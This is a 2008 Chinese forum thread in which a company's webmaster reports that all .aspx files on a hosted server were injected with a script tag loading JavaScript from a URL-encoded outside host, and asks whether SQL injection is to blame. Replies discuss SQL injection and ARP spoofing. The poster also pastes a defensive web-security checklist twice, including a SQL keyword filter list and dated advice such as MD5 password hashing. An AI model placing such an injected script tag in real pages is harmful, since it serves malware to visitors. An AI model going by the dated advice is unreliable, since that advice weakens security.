主题:网站安全 程序员才子们都进来
2098
5
来自:上海
注册:2000-10-26
发帖:240+8449
注册:2000-10-26
发帖:240+8449
今天发现我们公司托管在万网的服务器空间内所有的.aspx文件后都被插入了如下含病毒脚本的代码:<script language=javascript src=http://%77%2E%65%35%78%38%2E%63%6F%6D/js.js>
万网托管服务器为Win2003,数据库服务器为SQL2k
今年3.24日我们托管在万网的网站曾经出过类似问题,那次我们的数据库内都被暴力注入了和上述类似的代码,性质非常严重。
想跟大家咨询一下,发生这种问题,究竟是系统安全漏洞导致的,还是网站代码漏洞导致的?
会给专业答案20PP以表谢意
万网托管服务器为Win2003,数据库服务器为SQL2k
今年3.24日我们托管在万网的网站曾经出过类似问题,那次我们的数据库内都被暴力注入了和上述类似的代码,性质非常严重。
想跟大家咨询一下,发生这种问题,究竟是系统安全漏洞导致的,还是网站代码漏洞导致的?
会给专业答案20PP以表谢意
-------------------------------------------------------------------------------------------
放纵 只为藏起些许落寂的心情
转背 只为滑落一颗晶莹的泪滴
转背 只为滑落一颗晶莹的泪滴
发表于:2008-10-27 16:50:55
推荐:牙齿有问题,您找我!
...楼主...
2098
5
来自:上海
注册:2000-10-26
发帖:240+8450
注册:2000-10-26
发帖:240+8450
发表于:2008-10-27 16:58:03
推荐:名声!金钱!欲望!KDS股票大赛 —— 梦开始的地方!!!
...第1楼...
1239
49
来自:上海
注册:2002-09-04
发帖:2583+15712
注册:2002-09-04
发帖:2583+15712
发表于:2008-10-27 17:17:42
推荐:09年9-11月【最新】学车驾车报名咨询
...第11楼...
1239
49
来自:上海
注册:2002-09-04
发帖:2583+15714
注册:2002-09-04
发帖:2583+15714
发表于:2008-10-27 17:23:47
推荐:昨天帮同学介绍GF,想不到我同学那么戆。。。杯具啊
...第14楼...
1239
49
来自:上海
注册:2002-09-04
发帖:2583+15716
注册:2002-09-04
发帖:2583+15716
发表于:2008-10-27 17:30:24
推荐::==25 岁 以 后 知 道 你 就 太 晚 了【实用】 !!!
...第17楼...
144
57
来自:上海
注册:2007-01-08
发帖:18+716
注册:2007-01-08
发帖:18+716
发表于:2008-10-27 17:31:24
推荐:想不通 强烈要求和未来公公婆婆住一道 但是BF···
...第18楼...
552
240
来自:上海
注册:2004-03-08
发帖:298+2846
注册:2004-03-08
发帖:298+2846
发表于:2008-10-27 18:31:13
推荐:中国人在朝鲜做生意的亲身经历曝光:真的大长见识02
...第21楼...
469
21
来自:上海
注册:2002-05-23
发帖:31+615
注册:2002-05-23
发帖:31+615
当初还在学校,还懂点,现在在甲方,半年下来发现完全不懂了
我不想这么荒废掉
楼主看看这个,不知道行不行
http://bbs.blueidea.com/thread-2858511-1-1.html
http://net.zdnet.com.cn/security_zone/2008/0707/965160.shtml
-------------------------------------------------------------------------------------------
这个家伙很懒,什么也没留下......
发表于:2008-10-27 21:39:20
推荐:明天就是预产期了,小tf要出来了,求祝福
...第22楼...
340
102
来自:上海
注册:2001-06-09
发帖:36+473
注册:2001-06-09
发帖:36+473
lz说的情况不是很清楚,到底是源文件被加入代码还是ie打开后页面内加入代码。
两种情况都说一下。
如果是万网的虚拟主机,系统的安全性应该还可以的,你们代码有问题的可能性比较大一些,特别是sql注入,解决办法是彻底清查所有代码(很辛苦)。如果是托管的服务器,那么是你们自己系统安全设置没做好。
一般arp sniffer 攻击是在ie打开后的页面内加入一段iframe的代码,这个问题原因是同一个gateway下面有机器arp攻击你的服务器。解决办法是mac->ip的绑定,需要数据中心路由器上设置。
你的情况比较像sql注入,good luck.
两种情况都说一下。
如果是万网的虚拟主机,系统的安全性应该还可以的,你们代码有问题的可能性比较大一些,特别是sql注入,解决办法是彻底清查所有代码(很辛苦)。如果是托管的服务器,那么是你们自己系统安全设置没做好。
一般arp sniffer 攻击是在ie打开后的页面内加入一段iframe的代码,这个问题原因是同一个gateway下面有机器arp攻击你的服务器。解决办法是mac->ip的绑定,需要数据中心路由器上设置。
你的情况比较像sql注入,good luck.
获网友奖分80点(等于4点PP) [详细记录]
-------------------------------------------------------------------------------------------
你在看我的签名??????
发表于:2008-10-27 21:58:09
推荐:关于怀孕和紧急避孕药,耐心看完,你会默默感动
...第24楼...
2099
5
来自:上海
注册:2000-10-26
发帖:240+8452
注册:2000-10-26
发帖:240+8452
| 引用: lz说的情况不是很清楚,到底是源文件被加入代码还是ie打开后页面内加入代码。 两种情况都说一下。 如果是万网的虚拟主机,系统的安全性应该还可以的,你们代码有问题的可能性比较大一些,特别是sql注入,解决办法是彻底清查所有代码(很辛苦)。 |
晕了,我说的还不够清楚啊,是源文件被加入了代码,我用FTP把源文件下载后打开查看都是被插入了源代码的。
SQL注入的话,怎么彻底清查所有代码啊?你给举个例子好伐?我不是搞WEB开发的,你大概告诉我需要怎么清查法,谢谢了。
-------------------------------------------------------------------------------------------
放纵 只为藏起些许落寂的心情
转背 只为滑落一颗晶莹的泪滴
转背 只为滑落一颗晶莹的泪滴
发表于:2008-10-28 09:14:47
推荐:我和老公愚蠢幼稚的行为(转帖的,我看的笑死了)
...第25楼...
964
233
来自:上海
注册:2001-12-12
发帖:95+5094
注册:2001-12-12
发帖:95+5094
发表于:2008-10-28 09:21:34
推荐:看好冥王神话,圣斗士达人入,问问双子座的问题~
...第26楼...
1892
70
来自:上海
注册:2001-04-14
发帖:458+7148
注册:2001-04-14
发帖:458+7148
发表于:2008-10-28 09:28:36
推荐:开帖说说我不能和家里说的辛酸媳妇遭遇(原创)
...第27楼...
2099
5
来自:上海
注册:2000-10-26
发帖:240+8453
注册:2000-10-26
发帖:240+8453
网站应用方面需要注意的安全问题:
表单数据验证
在数据被输入程序前必须对数据合法性的检验。非法输入问题是最常见的Web应用程序安全漏洞。
需要做到:对任何输入内容进行检查。接受所有可以接受的内容,拒绝所有不能接受的内容。
所有提交的表单数据,都必须验证两次,即提交前在客户端用Javascript验证,提交后在服务器端用脚本再次验证,保证数据的合法性。尤其是对于必填项,不仅需要同时在客户端和服务端验证是否做了输入,还要验证输入的数据格式是否正确。
需要注意:在客户端上的Javascript验证并不是真正意义上的检查。比如恶意用户很容易在自己的终端上禁用脚本执行,从而防止客户端的内容检查脚本运行,使得他可以输入恶意代码并成功地提交表单。
对于图像上传功能,需要验证上传图像的格式及大小是否合乎要求。
防范SQL语句注入攻击
程序需要对所有从外部接收到的数据进行过滤,防止恶意攻击。主要防范的字符有“'|script|exec|insert|select|delete|update|count|chr|mid|master|truncate|declare”。
使用积极的过滤而不是消极的过滤。 换句话说,就是检查应该输入什么,而不是检查不应该输入什么。只规定哪些内容不应该输入,会留下太多的漏洞。因为有很多内容都不应该被输入。积极的过滤方式应该包括:
• 是否为空(需要去掉空格后判断)
• 是否是正确的数据类型 (字符串,整数等)
• 是否要求带有参数
• 字符编码是否允许
• 输入内容是否达到了内容长度的最大或者最小界限
• 是否允许输入空值
• 如果应该输入数字,那么确定数字大小的范围。
• 输入内容是否造成了数据重复,如果是,判断这种情况是否可以接受。
• 输入内容是否符合格式要求(比如是否采用正则表达式)
• 如果是通过下拉列表选取的内容,确保其包含了有效的值
地址栏变量需要进行验证
对于从地址栏上接收到的变量,必须要验证其合法性。例如,如果从地址栏上收到了文章ID值,则需要验证ID是否为数字,是否有攻击字符等。
跨站攻击的预防
在验证提交的数据时,为防止跨站攻击 ,可以检查上一个页面是否为本站,另外,过滤<iframe>、<javascript>、<alert>,重点把“<”替换为“<”,把 “>”替换为“>”
目录和文件夹的安全
用户只能访问网站目录下的内容,确保用户不能访问网站目录以外的目录。
程序中涉及文件包含的地方,要确认所有包含的文件的位置正确。为了防止非法包含文件,应特别小心“./”或“../”的使用。
后台所有程序页面需要做授权验证
如果未经过成功登录,不允许访问任何一个后台程序页面。如果用Session验证,Session有效期不可以太长,建议为15分钟。
成功登陆后的用户,需要验证是否有某个操作的权限。
关键信息需要加密
对于密码、会话令牌等关键信息,需要进行加密后再保存到数据库,不允许用明文方式。一般采用MD5加密方式。
配置文件安全
程序中的配置文件(重点是数据库连接配置)需要重点进行安全保护,配置文件不能允许用户直接访问,配置文件的文件扩展名不能为.inc、.txt,必须为可执行脚本扩展名,如.asp、.php、.jsp、.aspx…
数据库安全
数据库文件需要重点安全保护,对于使用access数据库的程序,不可以允许数据库直接可以通过浏览器下载,数据库文件的路径和文件名称需要不易猜测到,数据库文件的扩展名不能为.mdb。可以设置服务器来禁止此类型的文件下载。
使用“最低权限”限制数据库用户的权限。如果使用SQL SERVER或MySQL数据库,可以考虑只给浏览用户以读权限,后台用户以读、写及删权限。
资源的释放
程序中的使用了关键资源后,必须进行显式释放和关闭,尤其是数据库连接、文件句柄等资源。
防止过分详细的错误提示。
攻击者经常会故意输入错误的内容,进而分析系统给出的错误提示信息,从中获取系统信息,发现可能存在的漏洞。
对于使用Access数据库的用户来说,过于详细的错误提示可能会暴露出数据库文件的路径。
友好的操作反馈提示
对于流程性的操作,需要给用户的操作以友好性反馈提示,让用户了解自己的操作是否有问题,问题在什么地方。
例如,会员注册表单,如果用户提交时,忘记填写某些项,可以在该项后以醒目的颜色来提示,提示的显示最好以AJAX技术实现无刷新效果,提高用户体验。
后台的程序对于一些操作,如删除、审核,必须让用户确认一下才可以执行。
不管用户操作成功或失败,都需要给与提示信息。
验证码的使用
对于用户注册、用户登陆、调查问卷、在线反馈、评论等程序,需要加上验证码,防止机器人绕过限制提交垃圾信息。
表单数据验证
在数据被输入程序前必须对数据合法性的检验。非法输入问题是最常见的Web应用程序安全漏洞。
需要做到:对任何输入内容进行检查。接受所有可以接受的内容,拒绝所有不能接受的内容。
所有提交的表单数据,都必须验证两次,即提交前在客户端用Javascript验证,提交后在服务器端用脚本再次验证,保证数据的合法性。尤其是对于必填项,不仅需要同时在客户端和服务端验证是否做了输入,还要验证输入的数据格式是否正确。
需要注意:在客户端上的Javascript验证并不是真正意义上的检查。比如恶意用户很容易在自己的终端上禁用脚本执行,从而防止客户端的内容检查脚本运行,使得他可以输入恶意代码并成功地提交表单。
对于图像上传功能,需要验证上传图像的格式及大小是否合乎要求。
防范SQL语句注入攻击
程序需要对所有从外部接收到的数据进行过滤,防止恶意攻击。主要防范的字符有“'|script|exec|insert|select|delete|update|count|chr|mid|master|truncate|declare”。
使用积极的过滤而不是消极的过滤。 换句话说,就是检查应该输入什么,而不是检查不应该输入什么。只规定哪些内容不应该输入,会留下太多的漏洞。因为有很多内容都不应该被输入。积极的过滤方式应该包括:
• 是否为空(需要去掉空格后判断)
• 是否是正确的数据类型 (字符串,整数等)
• 是否要求带有参数
• 字符编码是否允许
• 输入内容是否达到了内容长度的最大或者最小界限
• 是否允许输入空值
• 如果应该输入数字,那么确定数字大小的范围。
• 输入内容是否造成了数据重复,如果是,判断这种情况是否可以接受。
• 输入内容是否符合格式要求(比如是否采用正则表达式)
• 如果是通过下拉列表选取的内容,确保其包含了有效的值
地址栏变量需要进行验证
对于从地址栏上接收到的变量,必须要验证其合法性。例如,如果从地址栏上收到了文章ID值,则需要验证ID是否为数字,是否有攻击字符等。
跨站攻击的预防
在验证提交的数据时,为防止跨站攻击 ,可以检查上一个页面是否为本站,另外,过滤<iframe>、<javascript>、<alert>,重点把“<”替换为“<”,把 “>”替换为“>”
目录和文件夹的安全
用户只能访问网站目录下的内容,确保用户不能访问网站目录以外的目录。
程序中涉及文件包含的地方,要确认所有包含的文件的位置正确。为了防止非法包含文件,应特别小心“./”或“../”的使用。
后台所有程序页面需要做授权验证
如果未经过成功登录,不允许访问任何一个后台程序页面。如果用Session验证,Session有效期不可以太长,建议为15分钟。
成功登陆后的用户,需要验证是否有某个操作的权限。
关键信息需要加密
对于密码、会话令牌等关键信息,需要进行加密后再保存到数据库,不允许用明文方式。一般采用MD5加密方式。
配置文件安全
程序中的配置文件(重点是数据库连接配置)需要重点进行安全保护,配置文件不能允许用户直接访问,配置文件的文件扩展名不能为.inc、.txt,必须为可执行脚本扩展名,如.asp、.php、.jsp、.aspx…
数据库安全
数据库文件需要重点安全保护,对于使用access数据库的程序,不可以允许数据库直接可以通过浏览器下载,数据库文件的路径和文件名称需要不易猜测到,数据库文件的扩展名不能为.mdb。可以设置服务器来禁止此类型的文件下载。
使用“最低权限”限制数据库用户的权限。如果使用SQL SERVER或MySQL数据库,可以考虑只给浏览用户以读权限,后台用户以读、写及删权限。
资源的释放
程序中的使用了关键资源后,必须进行显式释放和关闭,尤其是数据库连接、文件句柄等资源。
防止过分详细的错误提示。
攻击者经常会故意输入错误的内容,进而分析系统给出的错误提示信息,从中获取系统信息,发现可能存在的漏洞。
对于使用Access数据库的用户来说,过于详细的错误提示可能会暴露出数据库文件的路径。
友好的操作反馈提示
对于流程性的操作,需要给用户的操作以友好性反馈提示,让用户了解自己的操作是否有问题,问题在什么地方。
例如,会员注册表单,如果用户提交时,忘记填写某些项,可以在该项后以醒目的颜色来提示,提示的显示最好以AJAX技术实现无刷新效果,提高用户体验。
后台的程序对于一些操作,如删除、审核,必须让用户确认一下才可以执行。
不管用户操作成功或失败,都需要给与提示信息。
验证码的使用
对于用户注册、用户登陆、调查问卷、在线反馈、评论等程序,需要加上验证码,防止机器人绕过限制提交垃圾信息。
-------------------------------------------------------------------------------------------
放纵 只为藏起些许落寂的心情
转背 只为滑落一颗晶莹的泪滴
转背 只为滑落一颗晶莹的泪滴
发表于:2008-10-28 09:36:55
推荐:人穷 省了2个月钱 终于能带儿子去吃次KFC了 太享受了
...第29楼...
回复主题 [ 返回宽带山KDS ]  |
|
|---|---|
| 主题: | 网站安全 程序员才子们都进来 |
手机看宽带山
人像摄影推荐
